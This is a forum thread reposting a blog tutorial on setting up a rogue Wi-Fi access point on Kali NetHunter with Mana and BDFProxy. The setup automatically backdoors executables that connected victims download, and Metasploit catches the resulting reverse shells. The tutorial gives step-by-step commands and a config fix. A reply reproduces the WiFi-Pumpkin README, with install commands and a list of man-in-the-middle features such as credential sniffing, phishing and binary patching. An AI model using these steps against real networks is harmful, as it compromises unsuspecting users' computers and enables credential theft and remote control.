Nytro

EVIL ACCESS POINT WITH AUTO-BACKDOORING FTW!

EVIL ACCESS POINT WITH AUTO-BACKDOORING FTW!

This post is about setting up an evil access point that will automatically backdoor executables that connected users download. Pretty neat, right?

This tutorial is inspired by muts' NetHunter video of BDFProxy on NetHunter. I am using Kali NetHunter 2.0 running from a Nexus 9. I am using a TP-LINK TLWN722N (the 150Mbps version) as my secondary network interface.

I recently purchased a Nexus 9 tablet and decided to load it up with Kali NetHunter. NetHunter is a release of Kali made specifically for hackers on-the-go. It’s packed with lots of cool stuff like one-click scripts, HID Keyboard attack capabilities plus a bunch of the tools that Kali desktop comes with.

Tools

A few tools I will be using:

• Mana – Rouge Access Point toolkit. It implements a more advanced version of the Karma attack. The most notable improvement is Mana responds to other AP broadcasts instead of device probes like Karma, but still with the end goal of tricking victims into connecting to the AP you own. Plus, it includes lots of other neat evil AP tricks that are baked right in. For more info on Mana I’d recommend watching the Defcon 22 talk where the tool was release here.
  • BackdoorFactory BDFProxy – Automatically patches binaries with malicious payloads on the fly via MITM.

False Start

Since I want to also provide victims with Internet access so I can backdoor their downloads I will need another Wi-Fi interface on my Nexus 9. I ended up going with the TP-LINK TLWN722N because of its low power usage and its compatibility with Kali (supports packet injection).

I launched the Kali NetHunter menu and saw a promising looking menu item:

mana_nethunter_launcher-1.png

Kali NetHunter comes with Mana already installed and ready to go, or so I thought. Chances are I was doing something wrong, but I was not able to get the built-in one click launcher working out of the box.

It even contained a screen for bdfproxy.cfg! When I started it there was even the option to start with bdf:

mana_nethunter_bdfstart-2.png

But no dice. Even after correcting my upstream device from eth0 to wlan1 and double checking the dhcpd settings in the config file I couldn’t get the thing to run. I couldn't seem to find the output of either Mana or BDFProxy in the logs either.

Setting Up

So, off to the terminal! Home sweet home. I went into the Mana folder and skulked around a little bit:

cd /usr/share/mana-toolkit/run-mana

ls –lah

run_mana_cat-2.png

Aha! The start-nat-simple-bdf-lollipop.sh looks promising. Let’s have a look:

cat_mana_bdf_lolli-2.png

Everything looks pretty straightforward actually, which was pleasantly surprising. I never know what to expect with new tools. We assign some variables for devices, enable forwarding, start an access point and DHCP, monkey with the iptables and off we go. The only thing that stumped me at first was the “# Add fking rule to table 1006”.

There are some config files mentioned in there. Let’s make sure they are set up properly. First stop is /etc/mana-toolkit/hostapd-karma.confg:

hostapd_conf-1.png

Next let’s look at /etc/mana-toolkit/dhcpd.conf:

dhcpd_conf.png

Looks like we’re using Google for DNS and putting our clients on the 10.0.0.0/24 range. Cool beans.

Let’s also take a look at the BDFProxy config file at /etc/bdfproxy/bdfproxy.cfg (config file below truncated to the important parts):

bdfproxy_conf-2.png

Looks like there is something slightly off here. The IPs configured for our reverse shells (192.168.1.168 and 192.168.1.16) need to point back to us. According to our dhcpd.conf settings we're going to use the current settings aren't correct. We will be the router IP named in dhcpd.conf, so we need to change bdfproxy.cfg accordingly by setting all the HOSTs to point to us at 10.0.0.1. Quick replace with sed:

sed –i 's/192.168.1.168/10.0.0.1/g' bdfproxy.cfg

sed –I 's/192.168.1.16/10.0.0.1/g' bdfproxy.cfg

The diffs:

bdfproxy_conf_diffs-1.png

Starting up the Machine

Ok, so it’s time to start Mana up:

cd /usr/share/mana-toolkit/run-mana

./start-nat-simple-bdf-lollipop.sh

In a new terminal we start BDFProxy up:

cd /etc/bdfproxy/

./bdfproxy

Now that BDFProxy is up it has created a Metasploit resource file. It wasn’t entirely obvious at first where this file lived (it is not in /etc/bdfproxy/). It turns out the file is here: /usr/share/bdfproxy/bdfproxy_msf_resource.rc

That resource file will help handle reverse shells. Time to open another terminal, navigate there and start up Metasploit:

cd /usr/share/bdfproxy

service postresql start

cat bdf_msf_resource.rc #sanity check of conents, make sure IP update took

msfconsole –r bdfproxy_msf_resource.rc

After Metasploit is fired up we can see the resource file has loaded:

msf_loaded_bdfres-1.png

Sweetness.

Here is where I got stuck for a little bit. It appeared everything is set up and working properly. Mana was creating APs and I could connect and get back out to the internet. Iptables set up by Mana are correctly forwarding my traffic from port 80 to 8080 where BDFProxy is waiting. The problem is BDFProxy is failing to transparently proxy connections (mitmproxy underneath is actually failing). I got this error on all HTTP connections from my laptop test machine connected to the evil AP:

HttpError('Invalid HTTP request form (expected: absolute, got: relative)',)

It turns out I missed changing one of the default bdfproxy.cfg settings. The line

transparentProxy = NoneNeeds to be changed to:

transparentProxy = transparentAfter that BDFProxy was able to successfully backdoor executables. I connected to the AP with my laptop and download a file over http. I downloaded Audacity, and also tested with downloading Putty and PSFTP.

Once BDFProxy gets its hooks in the backdoor is dropped in place:

bdf_patch-2.png

Here is the part that blew me away: executables within zips are backdoored, all done on the fly. How cool is that? For executable formats it not only works for Windows exe/PEs, but it does Linux ELF and Mach-O (that means you OSX!). Very cool stuff.

- UPDATE 11/29/15: I've added some more content about BDFProxy in a new post here.

19 NOVEMBER 2015

Sursa: http://decidedlygray.com/2015/11/19/evil-access-point-with-auto-backdooring-ftw/

• Upvote 2

Ceva asemanator si aici,contine cam tot ce ai nevoie pentru MiTM :

logo

WiFi-Pumpkin

build

Framework for Rogue Wi-Fi Access Point Attack

Description

WiFi-Pumpkin is a open source security tool that provides the Rogue access point to Man-In-The-Middle and network attacks.

Installation

Kali 2.0/WifiSlax 4.11.1/Parrot 3.0.1/2.0.5

• Python 2.7
 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
 cd WiFi-Pumpkin
 ./installer.sh --install

refer to the wiki for Installation

Features

• Rogue Wi-Fi Access Point
  • Deauth Attack Clients AP
  • Probe Request Monitor
  • DHCP Starvation Attack
  • Credentials Monitor
  • Transparent Proxy
  • Windows Update Attack
  • Phishing Manager
  • Partial Bypass HSTS protocol
  • Support beef hook
  • Mac Changer
  • ARP Poison
  • DNS Spoof
  • Patch Binaries via MITM

Plugins

Plugin Description
net-creds Sniff passwords and hashes from an interface or pcap file
dns2proxy This tools offer a different features for post-explotation once you change the DNS server to a Victim.
sslstrip2 Sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks based version fork @LeonardoNve/@xtr4nge.
sergio-proxy Sergio Proxy (a Super Effective Recorder of Gathered Inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework.
BDFProxy-ng Patch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy @secretsquirrel.

Transparent Proxy

Transparent proxies that you can use to intercept and manipulate HTTP/HTTPS traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "Proxy" automatically will be listed on PumpProxy tab.

Plugins Example

The following is a sample module that injects some contents into the tag to set blur filter into body html page:

import logging
from Plugin import PluginProxy
from Core.Utils import setup_logger

class blurpage(PluginProxy):
    ''' this module proxy set blur into body page html response'''
    _name          = 'blur_page'
    _activated     = False
    _instance      = None
    _requiresArgs  = False

@staticmethod
    def getInstance():
        if blurpage._instance is None:
            blurpage._instance = blurpage()
        return blurpage._instance

def __init__(self):
        self.injection_code = []

def LoggerInjector(self,session):
        setup_logger('injectionPage', './Logs/AccessPoint/injectionPage.log',session)
        self.logging = logging.getLogger('injectionPage')

def setInjectionCode(self, code,session):
        self.injection_code.append(code)
        self.LoggerInjector(session)

def inject(self, data, url):
        injection_code = '''<head> <style type="text/css">
        body{
        filter: blur(2px);
        -webkit-filter: blur(2px);}
        </style>'''
        self.logging.info("Injected: %s" % (url))
        return data.replace('<head>',injection_code )

Screenshots

Screenshot on the wiki

FAQ

FAQ on the wiki

Contact Us

Whether you want to report a bug, send a patch or give some suggestions on this project, drop us or open pull requests

Happy MITM!

• Upvote 1